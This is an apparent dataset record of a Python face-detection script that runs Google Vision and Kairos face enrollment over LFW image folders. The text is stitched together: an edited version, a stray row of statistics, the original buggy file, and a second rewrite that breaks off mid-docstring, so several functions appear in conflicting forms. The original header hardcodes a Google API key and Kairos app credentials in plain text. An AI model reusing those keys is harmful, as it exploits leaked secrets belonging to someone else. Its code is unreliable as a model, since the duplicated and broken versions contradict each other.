    Return the axis-aligned bounding box of a circle centred at (x, y),
    as a [top_left, bottom_right] list of integer corner tuples.
    '''
    cx = int(x)
    cy = int(y)
    return [(cx - radius, cy - radius), (cx + radius, cy + radius)]
# [START get_vision_service]
# [END get_vision_service]
def detect_face(face_file, service, max_results=4):
    '''
    Uses the Vision API to detect faces in the face_file image
    object that was opened by the client with the following:
        with open(input_filename, 'rb') as face_file:
            detect_face(face_file, service, 3)

    service is a googleapiclient discovery service for 'vision' v1.

    RETURNS: the tuple (result_flag, err_msg, response_obj, face_data).
    face_data is None when the response carries no 'faceAnnotations'.
    '''
    # Read the previously-opened image file, base64-encode it and then decode it
    image_content = face_file.read()
    batch_request = [{
        'image': { 'content': base64.b64encode(image_content).decode('utf-8') },
        'features': [{ 'type': 'FACE_DETECTION', 'maxResults': max_results }]
    }]
    try:
        request = service.images().annotate(body={ 'requests': batch_request })
    except Exception as e:  # was misspelled 'Exceptiion', which raised a NameError instead of catching
        msg = 'Exception calling annotate service. Details: %s' % (str(e))
        return (False, msg, None, None)
    try:
        response = request.execute()
    except Exception as e:
        msg = 'Exception calling request.execute. Details: %s' % (str(e))
        return (False, msg, None, None)
    try:
        # The service omits 'faceAnnotations' when no face was found.
        face_data = None
        if 'faceAnnotations' in response['responses'][0].keys():
            face_data = response['responses'][0]['faceAnnotations']
    except Exception as e:
        msg = 'Exception accessing response object for face_data. Details: %s' % (str(e))
        return (False, msg, response, None)
    return (True, '', response, face_data)
def draw_landmark_boxes(image, xz_landmarks, output_filename):
    '''
    Draw a small filled green ellipse at each landmark position of the
    image and save the annotated copy to output_filename.
    '''
    annotated = Image.open(image)
    canvas = ImageDraw.Draw(annotated)
    for z_landmark in xz_landmarks:
        pos = z_landmark['position']
        # RADIUS is the module-level dot half-size for landmark markers.
        bbox = get_elipse_bounding_box(pos['x'], pos['y'], RADIUS)
        canvas.ellipse(bbox, fill='#00ff00')
    annotated.save(output_filename)
def highlight_faces(image, faces, output_filename):
    '''
    Draws a polygon around the faces, then saves to output_filename.
    Args:
      image: a file containing the image with the faces.
      faces: a list of faces found in the file, in the format returned
        by the Vision API (the 'fdBoundingPoly' vertices are used).
      output_filename: the name of the image file to be created, where the
        faces have polygons drawn around them.
    '''
    annotated = Image.open(image)
    canvas = ImageDraw.Draw(annotated)
    for face in faces:
        vertices = face['fdBoundingPoly']['vertices']
        # The service may omit a coordinate; default missing ones to 0.0.
        outline = [(v.get('x', 0.0), v.get('y', 0.0)) for v in vertices]
        # Close the polygon by repeating the first vertex.
        canvas.line(outline + [outline[0]], width=3, fill='#00ff00')
    annotated.save(output_filename)
def detect_and_annotate(input_filename, face_filename, json_filename, service, max_results):
    '''
    Detect faces in input_filename via the Vision API, draw the face box
    and landmark dots into face_filename, save the raw API response to
    json_filename, and extract per-face attributes.

    RETURNS: the tuple (result_flag, base_filename, xz_face_data, msg).
    On success xz_face_data is a list of per-face dictionaries with keys
    'headwear_likelihood', 'eye_distance' and 'face_angles'; on an early
    failure the third element is instead the face count found so far (an
    int), and msg describes the error.
    '''
    num_faces = 0
    base_filename = os.path.basename(input_filename)
    tmp_output = os.path.join(os.path.dirname(face_filename), 'tmp.jpg')
    # First detect the face, then draw a box around it, then save it
    with open(input_filename, 'rb') as source_image:
        (result, err_msg, response, face_data) = detect_face(source_image, service, max_results)
        if not result:
            msg = 'Error in detect_and_annotate calling detect_face. Details: %s' % err_msg
            return (False, base_filename, 0, msg)
        # The call succeeded but returned no face data
        if not face_data:
            msg = 'No face annotation data returned for %s' % (face_filename)
            return (False, base_filename, 0, msg)
        num_faces = len(face_data)
        # Reset the file pointer, so we can read the file again to draw the face rectangle
        try:
            source_image.seek(0)
            highlight_faces(source_image, face_data, tmp_output)
        except Exception as e:
            msg = 'Exception in highlight_faces. Details: %s' % (str(e))
            return (False, base_filename, num_faces, msg)
    try:
        # Draw ellipses for the landmarks on the image and save it to a different filename
        with open(tmp_output, 'rb') as source_image:
            xz_landmarks = face_data[0]['landmarks']
            draw_landmark_boxes(tmp_output, xz_landmarks, face_filename)
    except Exception as e:
        msg = 'Exception in draw_landmark_boxes. Details: %s' % (str(e))
        return (False, base_filename, num_faces, msg)
    try:
        # Save the raw API response as a JSON file
        (result, errmsg) = save_as_json(response, json_filename)
        if not result:
            return (False, base_filename, num_faces, errmsg)
    except Exception as e:
        msg = 'Exception calling save_as_json. Details: %s' % (str(e))
        return (False, base_filename, num_faces, msg)
    # Extract the attributes we care about for each detected face.
    xz_face_data = []
    for idx in range(0, num_faces):  # range: xrange does not exist on Python 3
        z_face_data = {}
        # Pull out headwearLikelihood value from json
        z_face_data['headwear_likelihood'] = face_data[idx]['headwearLikelihood']
        # Pull out eye locations and derive the inter-eye distance
        eye_data = get_eye_locations(face_data, idx)
        if len(eye_data) == 2:
            try:
                d = compute_eye_distance(eye_data)
            except Exception as e:
                print('Exception calling compute_eye_distance: %s' % (str(e)))
                return (False, base_filename, xz_face_data, '')
            # compute_eye_distance signals missing coordinates with a
            # negative value; store 0.0 in that case.
            z_face_data['eye_distance'] = d if d > 0.0 else 0.0
        else:
            z_face_data['eye_distance'] = 0.0
        # Pull out pan/tilt/roll angles
        try:
            z_face_data['face_angles'] = get_face_angles(face_data, idx)
        except Exception as e:
            print('Exception calling get_face_angles: %s' % (str(e)))
            return (False, base_filename, z_face_data, '')
        # Add this dictionary to our list
        xz_face_data.append(z_face_data)
    return (True, base_filename, xz_face_data, '')
def compute_eye_distance(eye_data):
    '''
    Return the Euclidean distance between the two eyes.

    eye_data is a list of two lists:
      eye_data[0]: [left_eye_x, left_eye_y, left_eye_z]
      eye_data[1]: [right_eye_x, right_eye_y, right_eye_z]

    Returns -1.0 when any coordinate is missing (None).
    '''
    left_eye_x, left_eye_y, left_eye_z = eye_data[0]
    right_eye_x, right_eye_y, right_eye_z = eye_data[1]
    coords = (left_eye_x, left_eye_y, left_eye_z,
              right_eye_x, right_eye_y, right_eye_z)
    # Explicit None test: the previous truthiness check ('if left_eye_x
    # and right_eye_x') wrongly treated a legitimate coordinate value of
    # exactly 0.0 as missing and returned -1.0.
    if any(c is None for c in coords):
        return -1.0
    x = left_eye_x - right_eye_x
    y = left_eye_y - right_eye_y
    z = left_eye_z - right_eye_z
    return np.sqrt(x * x + y * y + z * z)
def select_faces_to_keep(filename, xz_face_data):
    '''
    Decide which detected faces in an image are worth keeping.

    xz_face_data is a list of dictionaries.
    Each list item is a dictionary with the following key/values:
      'eye_distance' : distance (float)
      'headwear_likelihood' : likelihood enum (string)
      'face_angles' : dictionary with the following keys: 'pan', 'roll', 'pitch'
    Using the data we use some simple heuristics to determine which faces to keep.
    Rule 1. In an ideal condition, the best face is the one that is relatively much larger than
    the runner-up and has a pan angle close to 0.
    If both faces are about the same size, then the best face is the one with the pan
    angle closest to 0.

    NOTE(review): as written, every rule branch only prints a diagnostic
    line and nothing is ever appended to x_faces_to_keep, so the function
    always returns an empty list (and [] on exception) -- confirm whether
    the append logic was intended but not yet written.
    '''
    x_faces_to_keep = []
    # Collect the eye distances; a face's inter-eye distance is used as
    # a proxy for its size in the image.
    x_distances = []
    for z in xz_face_data:
        d = z['eye_distance']
        x_distances.append(d)
    # Get the largest face (largest eye distance) and its index in the list
    idx_of_largest_face = get_index_of_largest_eye_distance(x_distances)
    largest_eye_distance = x_distances[idx_of_largest_face]
    z_angles_of_largest_face = xz_face_data[idx_of_largest_face]['face_angles']
    pan_angle_of_largest_face = abs(z_angles_of_largest_face['pan'])
    # Null out the largest value so we can get runner-up
    x_distances[idx_of_largest_face] = 0.0
    # Get the runner-up face distance and its index in the list
    idx_of_second_largest_eye_distance = get_index_of_largest_eye_distance(x_distances)
    second_largest_eye_distance = x_distances[idx_of_second_largest_eye_distance]
    z_angles_of_runner_up_face = xz_face_data[idx_of_second_largest_eye_distance]['face_angles']
    pan_angle_of_runner_up = abs(z_angles_of_runner_up_face['pan'])
    # Calculate the relative difference between these two distances
    # This is a float between 0 and 1 in which a larger value indicates a greater relative difference
    try:
        relative_difference = calculate_relative_difference(largest_eye_distance, second_largest_eye_distance)
    except Exception as e:
        print('Exception thrown calling calculate_relative_difference. Details: %s' % (str(e)))
        return []
    # NOTE(review): face_difference and face_direction are not defined in
    # this file -- presumably enum-like helpers (objects exposing .name
    # and .d attributes, classifying size difference and pan direction);
    # confirm they are importable in this module's scope.
    rel_face_diff = face_difference(relative_difference)
    face_dir_largest = face_direction(pan_angle_of_largest_face)
    face_dir_runnerup = face_direction(pan_angle_of_runner_up)
    # ---------------------------------------------------------------------------------------------------------------
    # Rules for how we deal with other faces detected:
    # R0: Large relative difference in face size and forward-facing ==> Only keep largest face
    # R1: Medium relative difference in face size, but only largest face is forward-facing ==> Only keep largest face
    # R2:
    # R3
    # NOTE(review): every branch below prints the same 'Rule-0' label even
    # though the comments name rules R0-R4 -- looks like a copy-paste
    # leftover; verify which label each branch should print.
    # Rule R0: If much larger and forward-facing, then only keep the largest face
    if (rel_face_diff.name == 'LARGE' or rel_face_diff.name == 'EXTRA_LARGE') and \
        face_dir_largest.d == 'FORWARD':
        print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
            (filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
    # Rule R1: If larger, forward-facing face and runner-up is not forward-facing, then keep only largest face
    elif rel_face_diff.name == 'MEDIUM' and \
        face_dir_largest.d == 'FORWARD' and \
        (face_dir_runnerup.d == 'ANGLED' or face_dir_runnerup.d == 'SIDE_VIEW'):
        print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
            (filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
    # Rule R2: If approx same size faces, largest is forward-facing and runner-up is not forward-facing, keep the face that is forward-facing
    elif (rel_face_diff.name == 'EXTRA_SMALL' or rel_face_diff.name == 'SMALL') and \
        face_dir_largest.d == 'FORWARD' and \
        (face_dir_runnerup.d == 'ANGLED' or face_dir_runnerup.d == 'SIDE_VIEW'):
        print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
            (filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
    # Rule R3: If approx same size faces, largest is forward-facing and runner-up is forward-facing, keep both faces
    elif (rel_face_diff.name == 'EXTRA_SMALL' or rel_face_diff.name == 'SMALL') and \
        face_dir_largest.d == 'FORWARD' and face_dir_runnerup.d == 'FORWARD':
        print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
            (filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
    # Rule R4: If approx same size faces and largest face is not forward-facing, runner-up is forward-facing ==> Keep only runner-up face
    elif (rel_face_diff.name == 'EXTRA_SMALL' or rel_face_diff.name == 'SMALL') and \
        (face_dir_largest.d == 'ANGLED' or face_dir_largest.d == 'SIDE_VIEW') and \
        face_dir_runnerup.d == 'FORWARD':
        print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
            (filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
    else:
        print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
            (filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
    return x_faces_to_keep
def get_face_angles(face_data, face_idx):
    '''
    Extract the pan, tilt and roll angles for face number face_idx from
    the Google Vision face_data, returned as a dict keyed on angle name.
    All three values are None when any angle field cannot be read.
    '''
    try:
        return {
            'pan': face_data[face_idx]['panAngle'],
            'tilt': face_data[face_idx]['tiltAngle'],
            'roll': face_data[face_idx]['rollAngle'],
        }
    except Exception:
        # Any missing field voids the whole triple, matching the
        # all-or-nothing contract of the original implementation.
        return {'pan': None, 'tilt': None, 'roll': None}
def get_location_from_landmark_dict(z_lm):
    '''
    Return [x, y, z] from the landmark dictionary z_lm, reading the
    coordinates out of z_lm['position']. The Google service sometimes
    omits a coordinate; each missing one comes back as None.
    '''
    position = z_lm['position']
    return [position.get('x'), position.get('y'), position.get('z')]
def get_eye_locations(face_data, face_idx):
    '''
    Using the json face_data returned from the Google Vision detection
    call, get the locations of the left and right eye for the face with
    index face_idx (0 is the first face detected, 1 the second, ...).

    RETURNS: [[lx, ly, lz], [rx, ry, rz]]; an eye's coordinates are all
    None when no landmark of that type is present. (Previously a missing
    LEFT_EYE/RIGHT_EYE landmark raised a NameError because the local
    coordinate variables were only bound inside the matching branch.)
    '''
    left = [None, None, None]
    right = [None, None, None]
    # face_data[face_idx]['landmarks'] is a list of dictionaries; pick
    # out the ones whose 'type' is LEFT_EYE / RIGHT_EYE.
    for lm in face_data[face_idx]['landmarks']:
        if lm['type'] == 'LEFT_EYE':
            left = get_location_from_landmark_dict(lm)
        elif lm['type'] == 'RIGHT_EYE':
            right = get_location_from_landmark_dict(lm)
    return [left, right]
def get_index_of_largest_eye_distance(x_distances):
    '''
    Return the index of the maximum value in the x_distances list
    (the first such index when the maximum is tied).
    '''
    return max(range(len(x_distances)), key=x_distances.__getitem__)
def calculate_relative_difference(max_distance, runner_up_distance):
    '''
    Return the relative difference between the largest distance and the
    runner-up:
        Rel_Diff = (max_distance - runner_up_distance) / max_distance
    A ZeroDivisionError propagates when max_distance is 0 (callers
    catch it).
    '''
    gap = max_distance - runner_up_distance
    return gap / max_distance
def create_exclude_list(exclude_filename):
    '''
    Read exclude_filename and return its lines, each stripped of
    surrounding whitespace, as a list. These are the filenames that
    should be excluded from processing.
    '''
    with open(exclude_filename) as exclude_file:
        return [line.strip() for line in exclude_file]
if __name__ == '__main__':
    # Batch driver: walk an LFW-style tree of per-person image folders,
    # run Google Vision face detection on each image, write annotated
    # images and raw JSON responses to out_dir, enroll single-face images
    # with the Kairos face API, and print one summary line per file.
    print(sys.prefix)
    print(sys.version)
    print(sys.path)
    src_root_dir = r'E:\_Ancestry\lfw\lfw_tmp_efghijk_orig'
    out_dir = r'E:\_Ancestry\lfw\lfw_output'
    out_suffix = '_face'
    service = discovery.build('vision', 'v1', developerKey=API_KEY)
    enroll_id = 0  # renamed from 'id', which shadowed the builtin
    x_files = get_list_of_matching_files(src_root_dir, ('*.jpg', '*.jpeg'))
    for fn in x_files:
        # Derive the base name of the image. Previously 'basename' (and
        # 'filename' in the exception handler below) were used without
        # ever being assigned, raising a NameError on the first file.
        (dir_name, filename) = os.path.split(fn)
        (basename, ext) = os.path.splitext(filename)
        # Name of the output image file (with the out_suffix)
        face_fn = basename + out_suffix + '.jpg'
        full_output_face_fn = os.path.join(out_dir, face_fn)
        # Name of the output JSON file (.json ext)
        json_fn = basename + '.json'
        full_output_json_fn = os.path.join(out_dir, json_fn)
        try:
            (result, base_filename, xz_face_data, errmsg) = detect_and_annotate(fn, full_output_face_fn, full_output_json_fn, service, 3)
        except Exception as e:
            print('Exception calling detect_and_annotate on: %s, Details: %s' % (fn, str(e)))
            continue
        if not result:
            # On failure the third tuple element is a face count (int),
            # not a list, so skip the len()/indexing below and log it.
            print('Failure | %s | %s | %s' % (basename, fn, errmsg))
            continue
        google_result = 'Success'
        num_faces = len(xz_face_data)
        if num_faces == 1:
            try:
                (response_code, z_attributes) = kairos_face.enroll_face(enroll_id, 'gallery13', file=fn)
            except Exception as e:
                # Without this guard the loop carried on and read
                # z_attributes (and an unset kairos_result) after a
                # failed enrollment.
                print('Exception in enroll_face for %s. Details: %s' % (basename, str(e)))
                enroll_id += 1
                continue
            kairos_result = 'Success'
            face_idx = 0
            gender = z_attributes['gender']['type']
            age = z_attributes['age']
            confidence = z_attributes['confidence']
            headwear_likelihood = xz_face_data[0]['headwear_likelihood']
            eye_distance = xz_face_data[0]['eye_distance']
            pan_angle = xz_face_data[0]['face_angles']['pan']
            msg = '%s | %s | %s | %d | %s | %s | %s | %s | %s | %s | %s | %s' % (google_result, kairos_result, basename, face_idx, headwear_likelihood, gender, age, confidence, str(pan_angle), str(eye_distance), fn, errmsg)
            print(msg)
            enroll_id += 1
        # More than 1 face slightly complicates things ...
        else:
            # We only care about the "extra" faces if they meet the keep
            # conditions evaluated by select_faces_to_keep.
            try:
                x_faces_to_keep = select_faces_to_keep(base_filename, xz_face_data)
            except Exception as e:
                print('Exception in select_faces_to_keep on %s. Details: %s' % (base_filename, str(e)))
                continue
print('Done!') | 35.933333 | 219 | 0.681548 | # face_detector_google3.py
#
# This version expects a source folder containing folders of images,
# as you get with the LFW distribution.
# Each folder is named for one person and that folder should contain
# only photos of that person.
#
# Environment Variable: GOOGLE_APPLICATION_CREDENTIALS
# C:\pyDev\__My Scripts\face_detector_google\Face-Detection-3dc1b370d617.json
from __future__ import print_function
"""Draws squares around faces in the given image."""
import sys
import os
import os.path
parent_dir = os.path.dirname(os.getcwd())
sys.path.insert(0, parent_dir)
from mcm_lib2 import exception_utils as eu
from mcm_lib2 import fname as fnm
from mcm_lib2 import files_and_folders as ff
from mcm_lib2 import enum as en
import argparse
import base64
import json
import fnmatch
from googleapiclient import discovery
from oauth2client.client import GoogleCredentials
from PIL import Image
from PIL import ImageDraw
import numpy as np
import kairos_face
kairos_face.settings.app_id = "56aab423"
kairos_face.settings.app_key = "faa3e1412c97b3171dd7dcda3382313a"
RADIUS = 2
API_KEY = 'AIzaSyD3HsHlSOrQXhmqjpph9R9Di1pl_4WVNEY'
def get_list_of_matching_files(root_dir, image_ext_tuple):
'''
Returns a list of filenames in the specified directory that match the specified tuple.
Example tuple: ('*.jpg', '*.jpeg', '*.j2k', '*.png')
'''
x_matching_files = []
# Read the directories in the root_dir and then iterate over them
dirs = os.listdir(root_dir)
for dir in dirs:
full_dir = os.path.join(root_dir, dir)
for root, dirs, files in os.walk(full_dir):
for extension in image_ext_tuple:
for filename in fnmatch.filter(files, extension):
full_filename = os.path.join(full_dir, filename)
x_matching_files.append(full_filename)
return x_matching_files
def save_as_json(d, full_json_filename):
'''
'''
try:
json_string = json.dumps(d, indent=4)
except Exception as e:
return(False, 'Exception in save calling json.dumps. Details: %s' % (str(e)))
try:
with open(full_json_filename, "w") as text_file:
text_file.write("%s" % (json_string))
except Exception as e:
return (False, 'Exception in save() writing to output file: %s. Details: %s' % (full_json_filename, str(e)))
return (True, '')
def get_elipse_bounding_box(x, y, radius):
'''
Returns as a list the bounding box around the specified point
'''
#left = (int(x)-radius, int(y))
#right = (int(x)+radius, int(y))
#top = (int(x), int(y)-radius)
#bottom = (int(x), int(y)+radius)
top_left = (int(x)-radius, int(y)-radius)
bottom_right = (int(x)+radius, int(y)+radius)
#return [left, right, top, bottom]
return [top_left, bottom_right]
# [START get_vision_service]
def get_vision_service():
credentials = GoogleCredentials.get_application_default()
return discovery.build('vision', 'v1', credentials=credentials)
# [END get_vision_service]
def detect_face(face_file, service, max_results=4):
'''
Uses the Vision API to detect faces in the face_file image
object that was opened by the client with the following:
with open(input_filename, 'rb') as face_file:
detect_face(face_file, 3)
RETURNS: the following tuple (result_flag, err_msg, response_obj, face_data)
'''
# Read the previously-opened image file, base64-encode it and then decode it
image_content = face_file.read()
batch_request = [{
'image': { 'content': base64.b64encode(image_content).decode('utf-8') },
'features': [{ 'type': 'FACE_DETECTION', 'maxResults': max_results }]
}]
#service = get_vision_service()
# Exception details: <HttpError 403 when requesting https://vision.googleapis.com/v1/images:annotate?alt=json
# returned "The request cannot be identified with a client project. Please pass a valid API key with the request.">
#service = discovery.build('vision', 'v1')
#API_KEY = 'AIzaSyD3HsHlSOrQXhmqjpph9R9Di1pl_4WVNEY'
#service = discovery.build('vision', 'v1', developerKey = API_KEY)
try:
request = service.images().annotate(body={ 'requests': batch_request })
except Exceptiion as e:
msg = 'Exception calling annotate service. Details: %s' % (str(e))
return (False, msg, None, None)
try:
response = request.execute()
except Exception as e:
msg = 'Exception calling request.execute. Details: %s' % (str(e))
return (False, msg, None, None)
try:
face_data = None
if 'faceAnnotations' in response['responses'][0].keys():
face_data = response['responses'][0]['faceAnnotations']
except Exception as e:
msg = 'Exception accessing response object for face_data. Details: %s' % (str(e))
return (False, msg, response, None)
return (True, '', response, face_data)
def draw_landmark_boxes(image, xz_landmarks, output_filename):
'''
draws a polygon around each landmark and then save out the file to the specified
output_filename.
'''
im = Image.open(image)
draw = ImageDraw.Draw(im)
fill='#00ff00'
for z_landmark in xz_landmarks:
x = z_landmark['position']['x']
y = z_landmark['position']['y']
x_bbox = get_elipse_bounding_box(x, y, RADIUS)
draw.ellipse(x_bbox, fill=fill)
im.save(output_filename)
def highlight_faces(image, faces, output_filename):
'''
Draws a polygon around the faces, then saves to output_filename.
Args:
image: a file containing the image with the faces.
faces: a list of faces found in the file. This should be in the format
returned by the Vision API.
output_filename: the name of the image file to be created, where the
faces have polygons drawn around them.
'''
im = Image.open(image)
draw = ImageDraw.Draw(im)
for face in faces:
box1 = [(v.get('x', 0.0), v.get('y', 0.0)) for v in face['fdBoundingPoly']['vertices']]
#box2 = [(v.get('x', 0.0), v.get('y', 0.0)) for v in face['boundingPoly']['vertices']]
draw.line(box1 + [box1[0]], width=3, fill='#00ff00')
#draw.line(box2 + [box2[0]], width=3, fill='#00ff0f')
im.save(output_filename)
def detect_and_annotate(input_filename, face_filename, json_filename, service, max_results):
'''
RETURNS: the following tuple: (result_flag, base_filename, num_faces, headwear_likelihood, msg)
'''
num_faces = 0
base_filename = os.path.basename(input_filename)
tmp_output = os.path.join(os.path.dirname(face_filename),'tmp.jpg')
# First detect the face, then draw a box around it, then save it
with open(input_filename, 'rb') as source_image:
(result, err_msg, response, face_data) = detect_face(source_image, service, max_results)
if not result:
msg = 'Error in detect_and_annotate calling detect_face. Details: %s' % err_msg
return (False, base_filename, 0, msg)
# the call didn't return face data
if not face_data:
msg = 'No face annotation data returned for %s' % (face_filename)
return (False, base_filename, 0, msg)
# The call to detect_face succeeded and we have face_data
num_faces = len(face_data)
#print('Found {} face{}'.format(num_faces, '' if num_faces == 1 else 's'))
#print('Writing face rectangle to file {}'.format(face_filename))
# Reset the file pointer, so we can read the file again to draw the face rectangle
try:
source_image.seek(0)
highlight_faces(source_image, face_data, tmp_output)
except Exception as e:
msg = 'Exception in highlight_faces. Details: %s' % (str(e))
return (False, base_filename, num_faces, msg)
try:
# Draw ellipses for the landmarks on the image and save it to a different filename
with open(tmp_output, 'rb') as source_image:
xz_landmarks = face_data[0]['landmarks']
draw_landmark_boxes(tmp_output, xz_landmarks, face_filename)
except Exception as e:
msg = 'Exception in draw_landmark_boxes. Details: %s' % (str(e))
return (False, base_filename, num_faces, msg)
try:
# Save the JSON file
(result, errmsg) = save_as_json(response, json_filename)
if not result:
return (False, base_filename, num_faces, errmsg)
except Exception as e:
msg = 'Exception calling save_as_json. Details: %s' % (str(e))
return (False, base_filename, num_faces, msg)
# Iterate over the list of face_data
xz_face_data = []
for idx in xrange(0, num_faces):
z_face_data = {}
# Pull out headwearLikelihood value from json
headwear_likelihood = face_data[0]['headwearLikelihood']
z_face_data['headwear_likelihood'] = face_data[idx]['headwearLikelihood']
# Pull out eye locations
eye_data = get_eye_locations(face_data, idx)
if len(eye_data) == 2:
try:
d = compute_eye_distance(eye_data)
except Exception as e:
print('Exception calling compute_eye_distance: %s' % (str(e)))
return (False, base_filename, xz_face_data, '')
if d > 0.0:
z_face_data['eye_distance'] = d
else:
z_face_data['eye_distance'] = 0.0
else:
z_face_data['eye_distance'] = 0.0
# Pull out pan angles
try:
z_face_data['face_angles'] = get_face_angles(face_data, idx)
except Exception as e:
print('Exception calling get_face_angles: %s' % (str(e)))
return (False, base_filename, z_face_data, '')
# Add this dictionary to our list
xz_face_data.append(z_face_data)
return (True, base_filename, xz_face_data, '')
def compute_eye_distance(eye_data):
'''
eye_data is a list of two lists
eye_data[0]: [left_eye_x, left_eye_y, left_eye_z]
eye_data[1]: [right_eye_x, right_eye_y, right_eye_z]
'''
left_eye_x, left_eye_y, left_eye_z = eye_data[0]
right_eye_x, right_eye_y, right_eye_z = eye_data[1]
if left_eye_x and right_eye_x:
x = left_eye_x - right_eye_x
x = x * x
else:
return -1.0
if left_eye_y and right_eye_y:
y = left_eye_y - right_eye_y
y = y * y
else:
return -1.0
if left_eye_z and right_eye_z:
z = left_eye_z - right_eye_z
z = z * z
else:
return -1.0
d = np.sqrt(x + y + z)
return d
def select_faces_to_keep(filename, xz_face_data):
    '''
    xz_face_data is a list of dictionaries, one per detected face, with keys:
        'eye_distance'        : distance (float)
        'headwear_likelihood' : likelihood enum (string)
        'face_angles'         : dictionary with keys 'pan', 'roll', 'pitch'

    Using the data we use some simple heuristics to determine which faces
    to keep: the best face is the one that is relatively much larger than
    the runner-up and/or has a pan angle close to 0 (forward-facing).

    Bug fix: every rule branch previously logged the literal label
    'Rule-0', so the log output could not distinguish which rule fired.
    Each branch now selects its own label and a single shared print emits
    the message.

    NOTE(review): x_faces_to_keep is still never populated -- the rules
    only classify and log. Returning the (empty) list preserves the
    original behavior until the selection logic is implemented.
    '''
    x_faces_to_keep = []
    x_distances = [z['eye_distance'] for z in xz_face_data]
    # Largest face (largest eye distance) and its angles.
    idx_of_largest_face = get_index_of_largest_eye_distance(x_distances)
    largest_eye_distance = x_distances[idx_of_largest_face]
    z_angles_of_largest_face = xz_face_data[idx_of_largest_face]['face_angles']
    pan_angle_of_largest_face = abs(z_angles_of_largest_face['pan'])
    # Null out the largest value so we can find the runner-up.
    x_distances[idx_of_largest_face] = 0.0
    idx_of_second_largest_eye_distance = get_index_of_largest_eye_distance(x_distances)
    second_largest_eye_distance = x_distances[idx_of_second_largest_eye_distance]
    z_angles_of_runner_up_face = xz_face_data[idx_of_second_largest_eye_distance]['face_angles']
    pan_angle_of_runner_up = abs(z_angles_of_runner_up_face['pan'])
    # Relative difference between the two distances: float on (0, 1) in
    # which a larger value indicates a greater relative difference.
    try:
        relative_difference = calculate_relative_difference(largest_eye_distance, second_largest_eye_distance)
    except Exception as e:
        print('Exception thrown calling calculate_relative_difference. Details: %s' % (str(e)))
        return []
    rel_face_diff = face_difference(relative_difference)
    face_dir_largest = face_direction(pan_angle_of_largest_face)
    face_dir_runnerup = face_direction(pan_angle_of_runner_up)
    size = rel_face_diff.name
    dir_largest = face_dir_largest.d
    dir_runnerup = face_dir_runnerup.d
    # ------------------------------------------------------------------
    # Rules for how we deal with other faces detected:
    # R0: much larger and forward-facing           ==> keep largest only
    # R1: medium difference, only largest forward  ==> keep largest only
    # R2: similar sizes, only largest forward      ==> keep forward face
    # R3: similar sizes, both forward              ==> keep both faces
    # R4: similar sizes, only runner-up forward    ==> keep runner-up only
    # ------------------------------------------------------------------
    if size in ('LARGE', 'EXTRA_LARGE') and dir_largest == 'FORWARD':
        rule = 'Rule-0'
    elif size == 'MEDIUM' and dir_largest == 'FORWARD' and \
            dir_runnerup in ('ANGLED', 'SIDE_VIEW'):
        rule = 'Rule-1'
    elif size in ('EXTRA_SMALL', 'SMALL') and dir_largest == 'FORWARD' and \
            dir_runnerup in ('ANGLED', 'SIDE_VIEW'):
        rule = 'Rule-2'
    elif size in ('EXTRA_SMALL', 'SMALL') and dir_largest == 'FORWARD' and \
            dir_runnerup == 'FORWARD':
        rule = 'Rule-3'
    elif size in ('EXTRA_SMALL', 'SMALL') and \
            dir_largest in ('ANGLED', 'SIDE_VIEW') and dir_runnerup == 'FORWARD':
        rule = 'Rule-4'
    else:
        # No rule matched; still log the classification for diagnosis.
        rule = 'Rule-unmatched'
    print('%s: %s: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
          (filename, rule, size, relative_difference, dir_largest, pan_angle_of_largest_face, dir_runnerup, pan_angle_of_runner_up))
    return x_faces_to_keep
def get_face_angles(face_data, face_idx):
    '''
    Using the json face_data returned from the Google Vision detection call,
    get the pan, tilt and roll angles of the face and return them in a
    dictionary keyed on the angle name ('pan', 'tilt', 'roll').

    If the face index or any of the three angle keys is missing, all three
    values are returned as None (all-or-nothing, matching the original
    behavior so callers see a consistent dictionary).

    Fix: the previous bare `except Exception` swallowed every error; we now
    catch only the lookup failures this code can actually produce.
    '''
    face_angles = {'pan': None, 'tilt': None, 'roll': None}
    try:
        face = face_data[face_idx]
        angles = (face['panAngle'], face['tiltAngle'], face['rollAngle'])
    except (IndexError, KeyError, TypeError):
        # Missing face or missing angle key: report all angles as unknown.
        return face_angles
    face_angles['pan'], face_angles['tilt'], face_angles['roll'] = angles
    return face_angles
def get_location_from_landmark_dict(z_lm):
    '''
    z_lm is the landmark dictionary and z_lm['position'] is the dictionary
    holding the coordinate values. It appears that sometimes the Google
    service doesn't return a full dictionary, so each missing axis comes
    back as None.

    Returns [x, y, z] with None for any absent coordinate.
    '''
    position = z_lm['position']
    # dict.get returns None for absent axes -- same result as the old
    # `'x' in position.keys()` membership tests, without the extra lookups.
    return [position.get('x'), position.get('y'), position.get('z')]
def get_eye_locations(face_data, face_idx):
    '''
    Using the json face_data returned from Google Vision detection call,
    get the location of the left and right eye for the specified face index.
    face_idx:0 is the 0th face detected.
    face_idx:1 is the 1st face detected. ...

    Returns a two-element list [left_eye_xyz, right_eye_xyz]; each entry is
    [x, y, z] (components may be None) or [] if that eye's landmark was not
    present in the response.

    Bug fix: the previous version returned a list built from local
    variables (left_eye_x, ...) that were only bound inside the landmark
    loop, so a face whose LEFT_EYE or RIGHT_EYE landmark was missing
